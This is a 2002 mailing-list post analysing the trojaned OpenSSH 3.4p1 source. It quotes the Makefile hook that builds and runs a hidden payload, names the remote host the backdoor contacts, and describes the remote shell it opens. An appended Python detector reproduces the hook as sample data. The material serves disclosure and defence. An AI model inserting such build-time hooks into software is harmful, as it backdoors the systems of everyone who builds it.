Re: [fw-wiz] OpenSSH 3.4p1 possibly trojaned

From: hennings@skiinfo.com
Date: 08/01/02


From: hennings@skiinfo.com
To: "Paul D. Robertson" <proberts@patriot.net>
Date: Thu Aug  1 10:01:00 2002


| It would appear that the OpenSSH code for all the non-OpenBSD systems was
| trojaned at some point pretty recently.

(...)
| all: libopenbsd-compat.a
| + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
| ./bf-test.out &
|
| Trojan connection:
|
| 203.62.158.32:6667 (web.snsonline.net)

More details:

The source file (bf-test.c) contains a header with some spelling
mistakes, and then blocks of binary data. When run, the binary block is
deobfuscated and written to a shell script in the current directory
and then run from the Makefile.

The generated script contains some C code, which is compiled and then
run.

It's forking, connecting to 203.62.158.32:6667, and reading commands
from the socket, A, D or M. (D execs /bin/sh connected to the socket, A
exits, and M seems to make the process sleep for a while.)

Regards

Henning Spjelkavik

-- 
Skiinfo AS
Christian Krohgsgate 60     Fax:        22114011
0186 Oslo                   Foretaksnr: 976036859
 
http://www.webinfo.no/      E-mail:   info@webinfo.no

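As an added defensive example, not from the post or from the OpenSSH project: a small Python check that flags Makefile recipes of the kind quoted above (compile a helper, run it, feed its output to sh, background it) and measures how much of a C source file is non-printable data, which is how the binary blocks in bf-test.c would stand out. The Makefile excerpt and the two C files are constructed stand-ins.

```python
"""Heuristics for the build-time backdoor pattern described in the post."""
import re
import string

# Constructed Makefile excerpt reproducing the recipe quoted in the post.
SAMPLE_MAKEFILE = """\
all: libopenbsd-compat.a
\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

libopenbsd-compat.a: $(OBJS)
\t$(AR) rv $@ $(OBJS)
"""

# "$(CC) name.c -o name" with the output name stopping at ; & | or space.
COMPILE_RE = re.compile(r"\$\(CC\)\s+([^\s;&|]+)\.c\s+-o\s+([^\s;&|]+)")


def suspicious_recipes(makefile_text):
    """Return (line_no, line) for recipe lines that compile a program and, in
    the same line, run it, hand a file to sh, or background the command.
    A build rule normally only compiles; executing what it just built is the
    red flag."""
    hits = []
    for no, line in enumerate(makefile_text.splitlines(), 1):
        if not line.startswith("\t"):
            continue  # only recipe lines, not targets or variable assignments
        m = COMPILE_RE.search(line)
        if not m:
            continue
        prog = re.escape(m.group(2))
        runs_output = re.search(r"(^|[;&|\s])\./" + prog + r"\b", line)
        shells_file = re.search(r"\bsh\s+\./", line)
        backgrounded = line.rstrip().endswith("&")
        if runs_output or shells_file or backgrounded:
            hits.append((no, line.strip()))
    return hits


def binary_blob_ratio(source_bytes):
    """Fraction of bytes outside printable ASCII. Real C source is close to 0;
    an embedded obfuscated payload pushes the ratio up sharply."""
    printable = set(string.printable.encode())
    if not source_bytes:
        return 0.0
    return sum(b not in printable for b in source_bytes) / len(source_bytes)


# Constructed stand-ins: a clean C file and one padded with an opaque blob.
CLEAN_C = b'#include <stdio.h>\nint main(void){puts("hi");return 0;}\n'
BLOBBED_C = b"/* bf test */\n" + bytes(range(128, 256)) * 4 + b"\nint main(){}\n"

if __name__ == "__main__":
    for no, line in suspicious_recipes(SAMPLE_MAKEFILE):
        print(f"Makefile:{no}: suspicious recipe: {line}")
    print("clean ratio:", binary_blob_ratio(CLEAN_C))
    print("blob ratio:", binary_blob_ratio(BLOBBED_C))
```

Run it over an unpacked source tree by feeding each Makefile and .c file to the two functions; a hit on either is a reason to compare the tarball against the project's published checksums before building.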
